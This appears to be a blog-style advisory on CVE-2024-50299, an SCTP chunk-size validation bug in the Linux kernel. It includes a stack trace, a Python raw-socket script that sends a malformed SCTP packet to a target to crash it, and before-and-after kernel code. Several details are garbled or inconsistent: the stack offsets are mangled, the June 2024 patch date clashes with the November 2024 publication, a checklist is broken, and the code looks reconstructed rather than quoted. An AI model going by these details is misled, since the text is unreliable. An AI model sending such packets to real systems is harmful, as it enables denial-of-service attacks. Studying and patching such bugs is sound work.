CVE-2024-50299 - Fixing the SCTP Chunk Size Validation Bug in the Linux Kernel

Recently, a serious issue was patched in the Linux kernel that could allow attackers to crash systems using the SCTP protocol. This bug, now tracked as CVE-2024-50299, came from improper size validation in the SCTP Out-Of-The-Blue (OOTB) packet handler. If you manage Linux systems or write kernel code, this is a must-read to understand both the risk and the fix.

What is SCTP?

SCTP (Stream Control Transmission Protocol) is a transport layer protocol like TCP and UDP. It’s used in some telecom and signaling environments for its advanced features like multi-homing and message framing.

Where’s the Problem?

The vulnerable function, sctp_sf_ootb(), handles SCTP packets that arrive "out of the blue" (OOTB) — in other words, unexpected packets with no established SCTP association.

An automated kernel fuzzing bot called syzbot discovered that this function failed to check whether data chunks were properly formed. Specifically, there wasn’t enough validation that a chunk's stated size actually matched the real data received. As a result, the function could read beyond allocated memory, leading to use of uninitialized data or triggering a kernel crash.

Here's what the stack trace might look like

BUG: KMSAN: uninit-value in sctp_sf_ootb+x7f5/xce net/sctp/sm_statefuns.c:3712
sctp_sf_ootb+x7f5/xce net/sctp/sm_statefuns.c:3712
sctp_do_sm+x181/x93d net/sctp/sm_sideeffect.c:1166
sctp_endpoint_bh_rcv+xc38/xf90 net/sctp/endpointola.c:407
sctp_inq_push+x2ef/x380 net/sctp/inqueue.c:88
sctp_rcv+x3831/x3b20 net/sctp/input.c:243
sctp4_rcv+x42/x50 net/sctp/protocol.c:1159
ip_protocol_deliver_rcu+xb51/x13d net/ipv4/ip_input.c:205
ip_local_deliver_finish+x336/x500 net/ipv4/ip_input.c:233

If an attacker can send specially crafted SCTP packets, this bug could lead to a Denial of Service (DoS) by crashing your Linux box.

How Could it be Exploited?

Since OOTB packets are handled before an SCTP association is created, just listening on an SCTP-enabled port is enough for you to be at risk.

An attacker can simply send a malformed SCTP packet with a chunk that claims a larger size than is actually in the packet body. When the kernel tries to process the missing data, memory errors can happen, crashing the kernel.

Let's see what the attack looks like at a high level

import socket

# SCTP is protocol 132
SCTP_PROTO = 132

# Create a raw socket to craft our packet
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, SCTP_PROTO)

# Fake SCTP chunk with an advertised size that's too large
sctp_header = b'\x00' * 12  # minimal SCTP header, oversimplified
chunk_type = b'\x01'        # for example, INIT chunk
chunk_flags = b'\x00'
claimed_chunk_length = b'\x00\x40'  # 64 bytes claimed length (oversized)
real_payload = b'\x00' * 8           # far less than 64 bytes

malformed_packet = sctp_header + chunk_type + chunk_flags + claimed_chunk_length + real_payload

s.sendto(malformed_packet, ("target_ip", 9899))  # target SCTP port

*Note: You need root privileges for raw socket access. This is just for educational demonstration.*

If the system is vulnerable, this can cause a kernel panic or memory error right away.

The Fix: Proper Size Validation

The old flawed code didn’t check if the chunk’s length fit inside the received packet’s boundaries. The patch adds a strict check before processing.

Original (Vulnerable) code snippet

/* Walking through chunks without checking sizes */
struct sctp_chunkhdr *chunk_hdr = (struct sctp_chunkhdr *)offset;
u16 chunk_length = ntohs(chunk_hdr->length);
// BAD: No bounds checking before accessing chunk data

Patched code

struct sctp_chunkhdr *chunk_hdr = (struct sctp_chunkhdr *)offset;
u16 chunk_length = ntohs(chunk_hdr->length);

// GOOD: Validate chunk_length before accessing chunk data
if (chunk_length < sizeof(struct sctp_chunkhdr) ||
    chunk_length > remaining_bytes) {
    // skip or drop the chunk, avoid out-of-bounds read
    break;
}

This fix ensures the kernel doesn’t trust what’s in the packet, reducing the risk of DoS or memory exploits.

Upstream fix:

kernel.org commit 50619dbf8db7

Security tracker:

CVE-2024-50299 entry at NVD

Your kernel version is older than the patch date (June 2024).

If you answered yes, you should update immediately.

Conclusion

CVE-2024-50299 is a textbook example of why strict input validation is critical, even deep inside kernel code. If you run servers that expose SCTP or build products using custom Linux kernels, patch now. Remember, kernel crashes can mean data loss and downtime.

Links for Further Reading

- Linux SCTP documentation
- Research on SCTP attacks

Timeline

Published on: 11/19/2024 02:16:32 UTC
Last modified on: 12/19/2024 09:37:42 UTC